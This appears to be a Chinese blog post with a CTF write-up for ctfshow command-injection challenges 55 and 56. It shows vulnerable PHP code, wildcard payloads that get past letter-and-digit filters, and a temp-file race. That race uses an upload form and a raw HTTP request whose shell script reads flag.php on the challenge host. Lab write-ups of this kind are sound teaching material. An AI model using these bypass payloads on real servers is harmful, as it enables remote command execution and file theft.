<p><strong>用其他字符构造出相关字符如ls cat 进而执行函数</strong></p>
<h2 id="ctfshow-命令执行-55"><a href="#ctfshow-命令执行-55" class="headerlink" title="ctfshow-命令执行-55"></a>ctfshow-命令执行-55</h2><pre><code class="php"> &lt;?php
if(isset($_GET[&#39;c&#39;]))&#123;
    $c=$_GET[&#39;c&#39;];
    if(!preg_match(&quot;/\;|[a-z]|\`|\%|\x09|\x26|\&gt;|\&lt;/i&quot;, $c))&#123;
        system($c);
    &#125;
&#125;else&#123;
    highlight_file(__FILE__);
&#125;
</code></pre>
<p>过滤</p>
<pre><code class="php">preg_match(&quot;/\;|[a-z]|\`|\%|\x09|\x26|\&gt;|\&lt;/i&quot;, $c)
</code></pre>
<ul>
<li>i表示不区分大小写</li>
<li><code>\;</code>：匹配分号”;”。</li>
<li><code>[a-z]</code>：匹配任意小写字母。</li>
<li><code>\`` </code>:匹配反引号”&#96;”。</li>
<li><code>\%</code>：匹配百分号”%”。</li>
<li><code>\x09</code>：匹配水平制表符。</li>
<li><code>\x26</code>：匹配”&amp;”符号。</li>
<li><code>\&gt;</code>：匹配大于号”&gt;”。</li>
<li><code>\&lt;</code>：匹配小于号”&lt;”。</li>
</ul>
<h3 id="法一，法二和56做法一样"><a href="#法一，法二和56做法一样" class="headerlink" title="法一，法二和56做法一样"></a>法一，法二和56做法一样</h3><p>&#x2F;bin目录下存放了大部分可执行的命令</p>
<p>其中有一个命令为base64，</p>
<p>在linux里面就是将打印输出的字符转化为base64编码.</p>
<p>我们构造?c&#x3D;&#x2F;???&#x2F;????64 ????.???</p>
<p>前三个问号是&#x2F;bin，然后base64 最后是flag.php</p>
<p>会自己匹配</p>
<h2 id="web-56"><a href="#web-56" class="headerlink" title="web-56"></a>web-56</h2><h3 id="没有被过滤"><a href="#没有被过滤" class="headerlink" title=".没有被过滤"></a>.没有被过滤</h3><p>可以尝试 临时文件</p>
<blockquote>
<p>我们可以通过post一个文件(文件里面的sh命令)，在上传的过程中，通过 . (点)去执行执行这个文件。(形成了条件竞争)。</p>
<p>一般来说这个文件在linux下面保存在&#x2F;tmp&#x2F;php??????一般后面的6个字符是随机生成的有大小写。（可以通过linux的匹配符去匹配）<br>!:通过.去执行sh命令不需要有执行权限</p>
<p>bin&#x2F;</p>
</blockquote>
<p>.运行sh文件</p>
<pre><code class="php"> &lt;?php

if(isset($_GET[&#39;c&#39;]))&#123;
    $c=$_GET[&#39;c&#39;];
    if(!preg_match(&quot;/\;|[a-z]|[0-9]|\\$|\(|\&#123;|\&#39;|\&quot;|\`|\%|\x09|\x26|\&gt;|\&lt;/i&quot;, $c))&#123;
        system($c);
    &#125;
&#125;else&#123;
    highlight_file(__FILE__);
&#125; 
</code></pre>
<p>数字字母全无</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_46091464/article/details/108513145">https://blog.csdn.net/qq_46091464/article/details/108513145</a></p>
<pre><code>&lt;!DOCTYPE html&gt;
&lt;html lang=&quot;en&quot;&gt;
&lt;head&gt;
    &lt;meta charset=&quot;UTF-8&quot;&gt;
    &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;
    &lt;title&gt;POST数据包POC&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;form action=&quot;http://bd10d287-7dfb-45c9-87d8-00d7146ce421.challenge.ctf.show/&quot; method=&quot;post&quot; enctype=&quot;multipart/form-data&quot;&gt;
&lt;!--链接是当前打开的题目链接--&gt;
    &lt;label for=&quot;file&quot;&gt;文件名：&lt;/label&gt;
    &lt;input type=&quot;file&quot; name=&quot;file&quot; id=&quot;file&quot;&gt;&lt;br&gt;
    &lt;input type=&quot;submit&quot; name=&quot;submit&quot; value=&quot;提交&quot;&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;
</code></pre>
<p>访问这个html然后 上传一个php文件</p>
<p><strong>构造poc执行命令</strong></p>
<p><code>?c=.+/???/????????[@-[]</code><br> 注：后面的<code>[@-[]</code>是linux下面的匹配符，是进行匹配的大写字母。</p>
<p>为什么可以这样执行呢？</p>
<p>因为在linux里，如果一个文件里有命令，是可以通过这个文件名执行命令的，这里我们相当于使用临时文件执行了命令</p>
<p><img src="/img/image-20230605180037632.png"></p>
<p>然后把上传文件的内容改为</p>
<pre><code class="bash">#!/bin/sh
ls
</code></pre>
<pre><code>POST /?c=.%20/???/????????[@-[] HTTP/1.1
Host: bd10d287-7dfb-45c9-87d8-00d7146ce421.challenge.ctf.show
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1702859319697226373409551389
Content-Length: 382
Origin: null
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------1702859319697226373409551389
Content-Disposition: form-data; name=&quot;file&quot;; filename=&quot;1.php&quot;
Content-Type: application/octet-stream

#!/bin/sh

cat /var/www/html/flag.php
-----------------------------1702859319697226373409551389
Content-Disposition: form-data; name=&quot;submit&quot;

鎻愪氦
-----------------------------1702859319697226373409551389--
</code></pre>
<p><img src="/img/image-20230605180118443.png"></p>
<p>多发几次包,有时可能匹配不到</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_61778128/article/details/127063407">参考1</a></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/8107">参考2</a> </p>

      
       <hr><span style="font-style: italic;color: gray;"> 转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。可以邮件至 cgjue871@163.com </span>
    </div>
</article>







    




    </div>
    <div class="copyright">
        <p class="footer-entry">
    ©2023-2023 CCG
</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full" data-title="切换全屏 快捷键 s"><span class="min "></span></button>
<a class="" id="rocket" ></a>

    </div>
</div>

</body>
<script src="/js/jquery.pjax.js?v=1.1.0" ></script>

<script src="/js/script.js?v=1.1.0" ></script>
<script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        

        /*高亮代码块行号*/
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    

</script>

<!--加入行号的高亮代码块样式-->

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 542px;
    }
    .nav.fullscreen {
        margin-left: -542px;
    }
    .nav-left {
        width: 120px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    

    /* 背景图样式 */
    
    #post {
        background: url(/img/default2.png);
    }
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    
    .nav-right:before {
        content: ' ';
        display: block;
        position: absolute;
        left: 0;
        top: 0;
        width: 100%;
        height: 100%;
        opacity: 0.5;
        background: url("/img/hexo.png");
        background-repeat: no-repeat;
        background-position: 50% 0;
        -ms-background-size: cover;
        -o-background-size: cover;
        -moz-background-size: cover;
        -webkit-background-size: cover;
        background-size: cover;
    }
    

    
</style>







</html>
